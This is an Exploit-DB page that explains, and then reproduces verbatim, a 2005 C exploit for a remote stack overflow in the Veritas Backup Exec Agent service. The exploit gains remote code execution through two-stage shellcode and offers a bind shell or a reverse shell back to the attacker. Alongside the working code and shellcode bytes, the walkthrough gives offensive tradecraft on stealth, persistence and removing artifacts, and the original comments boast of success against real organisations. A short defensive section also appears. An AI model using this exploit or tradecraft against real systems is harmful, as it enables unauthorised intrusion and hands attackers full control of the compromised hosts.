By exploitdb papers bot•January 11, 2005•
papers
Veritas Backup Exec Agent 8.x/9.x Browser Overflow Explained
Veritas Backup Exec Agent 8.x/9.x Browser Overflow Explained
What this paper is
This paper details a remote stack overflow vulnerability in the Veritas Backup Exec Agent service (specifically benetns.exe). The vulnerability allows an attacker to execute arbitrary code on a vulnerable system by sending a specially crafted network request to the agent's browser service. The exploit provided aims to achieve remote code execution, typically by spawning a command shell.
Simple technical breakdown
The core of the vulnerability lies in how the Veritas Backup Exec Agent service handles incoming network requests. It appears to have a buffer overflow vulnerability when processing certain data, likely related to its browser interface or agent communication.
When a malicious request is sent, it overwrites the program's execution stack. This overwrite can be carefully crafted to redirect the program's execution flow to malicious code (shellcode) that the attacker also sends.
The exploit uses a two-stage approach for shellcode delivery, which is a common technique when the initial overflow buffer is small or when dealing with network services that might be unstable.
- First Stage (Initial Overflow): A small piece of shellcode is sent to establish a connection and locate a critical function (like
recv) within thebenetns.exeprocess. This stage is designed to be tiny and reliable. - Second Stage (Main Payload): After the first stage has prepared the ground, the main, larger shellcode is sent. This second stage then jumps to the code that was placed in memory by the first stage and executes the attacker's intended payload (e.g., a reverse shell).
The exploit also includes logic to adapt to different versions of Veritas Backup Exec and Windows operating systems, making it more universal.
Complete code and payload walkthrough
The provided C code implements the exploit. Let's break down the key components:
Global Variables and Data Structures
scode1[]: This is the first stage of the shellcode. It's a relatively large block of assembly instructions designed to be executed first. It includes NOP (No Operation) sleds for reliability.scode2[]: This is the second stage of the shellcode, likely containing the primary payload like a reverse shell. It's also a block of assembly instructions.payload[800]: A buffer to construct the final exploit payload.v91sp0sp1[],esisp0sp1[],v85[],esiold[]: These are small byte arrays that seem to contain specific offsets or addresses used to target different versions of Veritas Backup Exec. They are used to patch thetalkbuffer.talk[]: This is the initial network packet sent to the target. It contains:\x02\x00\x32\x00: Likely a protocol header or command identifier.\x90\x90\x90\x90: NOPs.- A significant block of shellcode (likely for setting up the connection and locating functions).
\x00: A null terminator."1.1.1.1.1.1": This string is interesting. It might be a placeholder or part of a command/identifier that gets processed.\x00: Another null terminator.\xEB\x80: This appears to be a short jump instruction, possibly to the start of the shellcode withintalkor to a specific handler.
Functions
ver(): Prints the exploit banner and version information.usage(char* us): Displays how to use the exploit program, including different command-line arguments and supported versions.main(int argc, char *argv[]): The main execution function.
main Function Logic
Initialization:
- Calls
ver()to display the banner. - Initializes WinSock on Windows (
WSADATA,WSAStartup). - Parses command-line arguments:
argv[1]: Version of Backup Exec (1 for v9.1, 2 for v8.5).argv[2]: Target IP address.argv[3]: Target port (defaults to 6101 if not provided).argv[4](optional): Attacker's IP address for reverse shell.argv[5](optional): Attacker's port for reverse shell.
- Performs argument validation using
usage().
- Calls
Target Configuration:
- Sets
ipandportbased onargv[2]andargv[3]. - Version Patching: Based on
argv[1], it copies specific byte sequences (v91sp0sp1,esisp0sp1,v85,esiold) into thetalkbuffer. This is crucial for targeting the correct memory addresses or offsets for different Backup Exec versions.memcpy(&talk[37], &v91sp0sp1, 4); memcpy(&talk[72], &esisp0sp1, 4);for v9.1.memcpy(&talk[37], &v85, 4); memcpy(&talk[72], &esiold, 4);for v8.5.
- Reverse Shell Configuration (if
argc == 6):- If reverse shell parameters (
GayIP,GayPORT) are provided, it XORs them with0x00000000and0x0000respectively. This is a simple obfuscation or encoding technique. - It then copies the XORed attacker IP (
gip) and port (gport) into specific locations withinscode1(&scode1[282]and&scode1[289]). This meansscode1is modified to contain the attacker's IP and port for the reverse shell connection.
- If reverse shell parameters (
- Payload Construction:
- If reverse shell parameters are provided (
argc == 6), it concatenatesscode1(now containing the attacker's IP/port) to thepayloadbuffer. - Otherwise (for bind shell or if reverse shell parameters are not fully provided), it concatenates
scode2to thepayloadbuffer.
- If reverse shell parameters are provided (
- Sets
Network Connection:
- Creates a TCP socket (
socket(AF_INET, SOCK_STREAM, 0)). - Sets up the
sockaddr_instructure for the target server. - Attempts to connect to the target server (
connect(s, (struct sockaddr *)&server, sizeof(server))). - Uses
select()to wait for a short period for the connection to establish. Ifselect()returns 0 or -1, it indicates a connection error.
- Creates a TCP socket (
Exploit Delivery:
- If connected (
FD_ISSET(s, &mask)is true):- Prints "constructing the payload...".
- First Send (
talk): Sends thetalkbuffer. This is the initial trigger for the overflow. - Delays (
Sleep): Small delays are inserted between sends. This is crucial for stability, especially on slower networks or systems, allowing the service to process the previous data before the next is sent. - Subsequent Sends (
payload): Thepayloadbuffer (containing eitherscode1orscode2) is sent multiple times (7 times in total). This is a critical part of the exploit's strategy. The initial overflow intalklikely creates a situation where the service is waiting for more data. By sending the main payload repeatedly, the exploit increases the chances that the shellcode will be placed in memory and that the overflowed return address will point to it. The repeated sends also help overcome potential network packet loss or service instability. - A longer delay (
Sleep(1000)orSleep(1)) is added after the final payload send. - Prints the total payload size and "payload sent."
- If connected (
Cleanup:
- Closes the socket (
closesocket(s)). - Cleans up WinSock on Windows (
WSACleanup()).
- Closes the socket (
Shellcode Breakdown (Conceptual)
scode1(Matt Miller's 'skape' shellcode): This shellcode is designed to be small and efficient. Its primary goal is to locate therecvfunction within thebenetns.exeprocess. It likely does this by traversing the process's loaded modules and looking for the function's address. Once found, it prepares to receive the second stage of the shellcode. The extensive NOP sled at the end is a common technique to increase the chances of hitting the shellcode with the overflow. The specific bytes at[282]and[289]are overwritten with the attacker's IP and port if a reverse shell is configured.scode2(H.D. Moore Shellcode): This is a more feature-rich shellcode. It's likely responsible for establishing the actual shell connection.- If it's a bind shell, it will bind a shell to a specific port on the target machine, allowing the attacker to connect to it.
- If it's a reverse shell, it will initiate a connection back to the attacker's specified IP and port and then spawn a command shell.
- The extensive use of
\x88,\x89,\x90,\x91, etc., suggests complex logic for string manipulation, system calls, and socket operations. The repeated bytes like\x88\x88\x88might be part of a pattern or data structure that the shellcode interprets.
talk Buffer Breakdown
\x02\x00\x32\x00: Likely a message type or command identifier for the Backup Exec agent service.\x90\x90\x90\x90: NOPs to ensure the execution flow lands correctly.\x31\xF6\xC1\xEC\x0C\xC1\xE4\x0C\x89\xE7\x89\xFB\x6A\x01\x8B\x74\x24\xFE\x31\xD2\x52\x42\xC1\xE2\x10\x52\x57\x56\xB8\x00\x00\x00\x00\xC1\xE8\x08\xFF\x10\x85\xC0\x79\x07\x89\xDC\x4E\x85\xF6\x75\xE1\xFF\xE7: This is the initial shellcode withintalk. It's designed to be small and set up the environment for the second stage. It likely performs tasks like:- Resolving necessary API functions (e.g.,
CreateProcess,Socket,Connect,Send,Recv). - Setting up the stack and registers.
- Potentially preparing for the overflow or receiving the next stage.
- Resolving necessary API functions (e.g.,
\x90\x90\x90\x90(repeated): More NOPs for padding and ensuring reliable execution.\x00: Null terminator."1.1.1.1.1.1": This string is unusual. It might be a specific identifier that the service expects, or it could be part of a data structure that the overflow manipulates. Its exact purpose is not explicitly clear from the code alone but it's sent after the initial shellcode.\x00: Null terminator.\xEB\x80: A short jump instruction. This might be used to jump to the start of thetalkshellcode or to a specific handler within the service that the overflow targets.
Code Fragment/Block -> Practical Purpose Mapping
scode1[]: First stage shellcode, prepares for second stage, contains reverse shell IP/port if specified.scode2[]: Second stage shellcode, typically a bind or reverse shell.talk[]: Initial network packet containing a small shellcode, protocol headers, and potentially data to trigger the overflow.v91sp0sp1[],esisp0sp1[],v85[],esiold[]: Version-specific offsets/addresses used to patch thetalkbuffer.memcpy(&talk[37], ..., 4): Patches thetalkbuffer with version-specific data.memcpy(&scode1[282], &gip, 4): Embeds attacker IP intoscode1for reverse shell.memcpy(&scode1[289], &gport, 2): Embeds attacker port intoscode1for reverse shell.strcat(payload, scode1)/strcat(payload, scode2): Constructs the main payload buffer.send(s, talk, ..., 0): Sends the initial trigger packet.send(s, payload, ..., 0)(repeatedly): Sends the main shellcode multiple times to ensure execution.Sleep(10)/Sleep(1/100): Small delays for stability.Sleep(1000)/Sleep(1): Longer delay after payload delivery.
Practical details for offensive operations teams
- Required Access Level: Network access to the target machine's IP and port where the Veritas Backup Exec Agent service is listening (default 6101). No local access is required.
- Lab Preconditions:
- A vulnerable version of Veritas Backup Exec (8.x or 9.x) installed on a target Windows machine.
- The Veritas Backup Exec Agent service (
benetns.exe) must be running and accessible over the network. - A network path from the attacker's machine to the target machine.
- For reverse shells, the attacker machine must be reachable from the target machine on the specified listener port.
- Tooling Assumptions:
- A C compiler (like MSVC, MinGW, or GCC on Linux/Cygwin) to compile the exploit code.
- Standard networking utilities.
- Execution Pitfalls:
- Version Mismatch: Targeting the wrong version of Backup Exec will likely cause the service to crash without exploitation, or the exploit will fail. The exploit code has specific logic for v9.1 SP0/SP1 and v8.5.
- Firewalls/Network Segmentation: Network firewalls might block the connection to the agent service or prevent reverse shells from connecting back.
- Service Instability: The author notes that the service can be unstable across different Windows versions, and debugging the IAT (Import Address Table) method was difficult. This implies potential for the service to crash even if the exploit is technically correct.
- Shellcode Detection: Antivirus or Intrusion Detection Systems (IDS) might detect the shellcode. The author mentions adding more NOPs or modifying the shellcode if detection occurs.
- Timing Issues: The repeated sending of the payload and the delays are critical. Incorrect timing can lead to the shellcode not being executed or the service crashing.
- Null Bytes in Reverse IP: The author warns about null bytes in the reverse IP address. This is a common issue with shellcode that parses IP addresses.
- Service Restart: If the service crashes, it might automatically restart, or it might require a manual restart. This can affect the window of opportunity for exploitation.
- Tradecraft Considerations:
- Reconnaissance: Accurately identify the version of Veritas Backup Exec running on the target. This is paramount.
- Payload Choice: Decide between a bind shell (easier to initiate, but requires opening a port on the target) or a reverse shell (more stealthy, but requires the target to connect back). The exploit supports both.
- Stealth: The initial connection and data transfer might be logged. The repeated sending of the payload could be noisy. Consider network traffic analysis.
- Post-Exploitation: Once a shell is obtained, immediately pivot to establishing persistence and escalating privileges.
- Cleanup: Ensure no residual artifacts are left behind that could indicate compromise.
Where this was used and when
- Discovery/Publication: The exploit paper was published on January 11, 2005.
- Vulnerable Versions: Veritas Backup Exec versions 8.5.3572, 9.1.4691.SP0, and 9.1.4691.SP1 are explicitly mentioned as vulnerable.
- Reported Usage: The author mentions in "v0.4" that an anonymous tester reported successful exploitation against "some organisations such nasa, states/edus" approximately one month after the advisory was released. This suggests that the vulnerability was actively exploited in the wild shortly after its discovery.
- Operating Systems Tested: The author provides a detailed list of successful tests across:
- Windows 2000 SP4 (Server and Pro)
- Windows XP SP1 and SP1a (Pro)
- Windows 2003 SP0 (Server)
- NT4 (Server)
Defensive lessons for modern teams
- Patch Management: This exploit highlights the critical importance of timely patching. Veritas released a hotfix for this vulnerability. Organizations that did not patch were susceptible.
- Service Hardening: Services exposed to the network, especially older ones, are prime targets. Ensure only necessary services are enabled and accessible.
- Network Segmentation: Isolating critical backup infrastructure from general network access can limit the blast radius of such vulnerabilities.
- Intrusion Detection/Prevention: Network-based IDS/IPS systems can potentially detect the malformed packets or the characteristic shellcode patterns used in exploits.
- Vulnerability Scanning: Regularly scan your network for known vulnerabilities, including those in legacy software.
- Logging and Monitoring: Monitor logs for unusual network connections to backup services or unexpected service crashes.
- Software Inventory: Maintain an accurate inventory of all software, including version numbers, to identify vulnerable systems.
ASCII visual (if applicable)
+-----------------+ +----------------------+ +-----------------+
| Attacker Machine|----->| Network (Internet/LAN)|----->| Target Machine |
+-----------------+ +----------------------+ +-----------------+
|
| TCP Connection (Port 6101 or custom)
v
+-------------------------+
| Veritas Backup Exec |
| Agent Service (benetns.exe)|
+-------------------------+
|
| Malicious Network Request
| (Overflowing Buffer)
v
+-------------------------+
| Stack Corruption |
| (Return Address Hijacked)|
+-------------------------+
|
| Redirect Execution Flow
v
+-------------------------+
| Shellcode Execution |
| (Stage 1 -> Stage 2) |
+-------------------------+
|
| Spawn Shell (Bind/Reverse)
v
+-------------------------+
| Command Shell |
+-------------------------+Source references
- Exploit-DB Paper: https://www.exploit-db.com/papers/750
- Original Source Code: Provided in the prompt.
Original Exploit-DB Content (Verbatim)
/* Got to give it to class101 on this one.
* Tested and penetrated. / str0ke
*/
/*
VERITAS Backup Exec v9.1.4691.SP1
v9.1.4691.SP0
v8.5.3572
Agent Browser Service, Remote Stack Overflow
Highly Critical
All credits to:
-iDEFENSE(discovery-www.iDEFENSE.com),
-Thor Doomen(iat-syscall[at]inbox.lv),
-H.D. Moore(scode-www.metasploit.com),
-Matt Miller(scode-www.hick.org)
ExtraNotes:
All my tests/debugs where a bit long (some days) firstly due to the big size
of Backup Exec and the unstability accross differents windows versions
to make working that IAT method with 100% success and the difficulty to debug it.
(As a recall, due to the 60 bytes only free, a tiny shellcode is send in first to scan
the recv function of benetns.exe and jump to the data submitted during the second send,
thanx syscall. Let's think large now. Imagine that you exploits the hole and you submit
the shellcode 5 minutes later, the service will hang on to death of course until a kill,
now imagine that you exploits the hole and you submit the shellcode too faslty for the,
computer processing, the shellcode can be missed, wont be executed again, sometimes yes/no, but really unstable.
Hopefully (or unfortunely for you admin :>) I'm here to optimize it and make it 100% working, universal,
stable whatever you want for the good fortune of script kiddies and to show what mean working to my good
friends ka-odick :>
Tries
Machine Bind / Rverse / Success
(2x) Win2k SP4 Server English 10 10 20
(1x) Win2k SP4 Pro English 5 5 10
(1x) WinXP SP1 Pro English 5 5 10
(1x) WinXP SP1a Pro English 5 5 10
(3x) Win2003 SP0 Server English 5 5 10
(1x) Win2003 SP0 Server Ita. 5 5 10
(1x) NT4 Server English. 5 5 10
= Universal
v0.1:
C code based on Thor Doomen's code posted at the metasploit mailing list,
excellent in the method, but super unstable to not say not working when used,
made some changes.
v0.2:
fix of the first big problem , the missed shellcode accross differents windows,
fixed by flooding benetns with more sends, timer really small, this is important.
padding 1 nop to the reverse shellcode as needed, else crash on reverse.
v0.3:
universal esi call across v9.1 SP0 and SP1, for the good fortune of script kiddies.
v0.4:
As a warning, this poc v0.4 as been tested working by an anonymous tester (never mentionned there)
on some organisations such nasa, states/edus, it's urgent to update 1 month after the advisory, sleepers.
Tips: -make sure that your ip is safe of null bytes in reverse mode.
-make sure that you targets the good version of Backup Exec,
else you crash it.
-Backup Exec v10.0 is now available, get it at www.veritas.com.
-Visit dfind.kd-team.com for a patched benetns.exe, quick solution
for an urgent update. (extracted from the hotfix at www.veritas.com)
Backup Exec 9.x is tested safe after replacing the .exe
Greetings:
Nima Majidi
Behrang Fouladi
Pejman
keystr0ke
JGS
DiabloHorn
kimatrix
NaV
New Metasploit v2.3 (http://www.metasploit.com/)
and all idlers of #n3ws on Eris Free Network.
by class101 [at] hat-squad.com
answering to all stupid questions that I got & will have, no I'm not persian and you don't care where I come from.
04 January 2005
*/
#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif
char scode1[]=
//file://Matt Millers 'skape' shellcode.
"\x90" // pad needed their for me, if you get scode detection problems on slow connections,
//file://try to add more NOP and make sure to update the memcpys later in the code.
"\xeb\x6e\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0d\x56\x8b\x40\x0c\x8b\x70\x1c\xad"
"\x8b\x40\x08\x5e\xc3\x8b\x40\x34\x83\xc0\x7c\x8b\x40\x3c\xc3\x60\x8b\x6c\x24\x24"
"\x8b\x45\x3c\x8b\x7c\x05\x78\x03\xfd\x8b\x4f\x18\x8b\x5f\x20\x03\xdd\xe3\x33\x49"
"\x8b\x34\x8b\x03\xf5\x33\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x03\xd0\xeb"
"\xf4\x3b\x54\x24\x28\x75\xe2\x8b\x5f\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5f\x1c\x03"
"\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa9\xff"
"\xff\xff\x89\x07\x83\xc4\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72"
"\xfe\xb3\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa\x60\xcb"
"\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff"
"\xff\x5e\xe8\x47\xff\xff\xff\x8b\xd0\x83\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10"
"\xe8\xa5\xff\xff\xff\x83\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f"
"\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8\x01\x63"
"\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0"
"\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0"
"\x68\x7f\x01\x01\x01\xb8\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50"
"\x53\x56\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6"
"\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d\x77\x44"
"\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50"
"\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55\x20\xff\x55\x0c\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char scode2[]=
//file://HD.Moore Shellcode
//file://"\x90" uncomment this if you have scode detection problem on slows connections or try more NOP,
//file://but for me and some other guys its already fine like this.
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";
static char payload[800];
char v91sp0sp1[]="\xFF\x50\x11\x40";
char esisp0sp1[]="\xA1\xFF\x42\x01";
char v85[]="\xFF\x38\x11\x40";
char esiold[]="\xB9\x08\x43\x01";
char talk[] =
"\x02\x00\x32\x00"
"\x90\x90\x90\x90"
"\x31\xF6\xC1\xEC\x0C\xC1\xE4\x0C\x89\xE7\x89\xFB\x6A\x01\x8B\x74"
"\x24\xFE\x31\xD2\x52\x42\xC1\xE2\x10\x52\x57\x56\xB8\x00\x00\x00"
"\x00\xC1\xE8\x08\xFF\x10\x85\xC0\x79\x07\x89\xDC\x4E\x85\xF6\x75"
"\xE1\xFF\xE7\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x00"
"1.1.1.1.1.1"
"\x00"
"\xEB\x80";
#ifdef WIN32
WSADATA wsadata;
#endif
void ver();
void usage(char* us);
int main(int argc,char *argv[])
{
ver();
unsigned long gip;
unsigned short gport;
char *os;
if (argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;}
if (argc==5){usage(argv[0]);return -1;}
if (strlen(argv[2])<7){usage(argv[0]);return -1;}
if (argc==6)
{
if (strlen(argv[4])<7){usage(argv[0]);return -1;}
}
#ifndef WIN32
if (argc==6)
{
gip=inet_addr(argv[4])^(long)0x00000000;
gport=htons(atoi(argv[5]))^(short)0x0000;
}
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
if (argc==6)
{
gip=inet_addr(argv[4])^(ULONG)0x00000000;
gport=htons(atoi(argv[5]))^(USHORT)0x0000;
}
#endif
int ip=htonl(inet_addr(argv[2])), port;
if (argc==4||argc==6){port=atoi(argv[3]);} else port=6101;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1){printf("[+] socket() error\n");return -1;}
if (atoi(argv[1])==1) {memcpy(&talk[37], &v91sp0sp1, 4);memcpy(&talk[72], &esisp0sp1, 4);os="Backup Exec v9.1.4691.1\n[+] Backup Exec v9.1.4691.0";}
else {memcpy(&talk[37], &v85, 4);memcpy(&talk[72], &esiold, 4);os="Backup Exec v8.5.3572";}
if (argc==6)
{
memcpy(&scode1[282], &gip, 4);
memcpy(&scode1[289], &gport, 2);
strcat(payload,scode1);
}
else strcat(payload,scode2);
printf("[+] target(s): %s\n",os);
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
printf("[+] connected, constructing the payload...\n");
if (send(s,talk,sizeof(talk)-1,0)==-1) { printf("[+] sending error 1, the server prolly rebooted.\n");return -1;}
#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 2, the server is patched.\n");return -1;}
#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 3, the server is patched.\n");return -1;}
#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 4, the server is patched.\n");return -1;}
#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 5, the server is patched.\n");return -1;}
#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 6, the server is patched.\n");return -1;}
#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 7, the server is patched.\n");return -1;}
#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 8, the server is patched.\n");return -1;}
#ifdef WIN32
Sleep(1000);
#else
Sleep(1);
#endif
printf("[+] size of payload: %d\n",(sizeof(talk)-1)+strlen(payload)*7);
printf("[+] payload sent.\n");
return 0;
}
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}
void usage(char* us)
{
printf("USAGE:\n");
printf(" [+] . 101_BXEC.exe Version VulnIP\n");
printf(" [+] . 101_BXEC.exe Version VulnIP VulnPORT\n");
printf(" [+] . 101_BXEC.exe Version VulnIP VulnPORT GayIP GayPORT\n");
printf("VERSION: \n");
printf(" [+] 1. Backup Exec v9.1.4691.SP1\n");
printf(" [+] 1. Backup Exec v9.1.4691.SP0\n");
printf(" [+] 2. Backup Exec v8.5.3572\n");
printf("TARGET: \n");
printf(" [+] . 2k3/2k/XP/NT4 universal (*)\n");
printf("NOTE: \n");
printf(" The exploit bind a cmdshell port 101 or\n");
printf(" reverse a cmdshell on your listener.\n");
printf(" A wildcard (*) mean tested working.\n");
printf(" Compilation msvc6, cygwin, Linux.\n");
return;
}
void ver()
{
printf(" \n");
printf(" ================================================[0.4]========\n");
printf(" =================VERITAS Backup Exec 8.x/9.x=================\n");
printf(" =========Agent Browser Service, Remote Stack Overflow========\n");
printf(" ======coded by class101=============[Hat-Squad.com 2005]=====\n");
printf(" =============================================================\n");
printf(" \n");
}
// milw0rm.com [2005-01-11]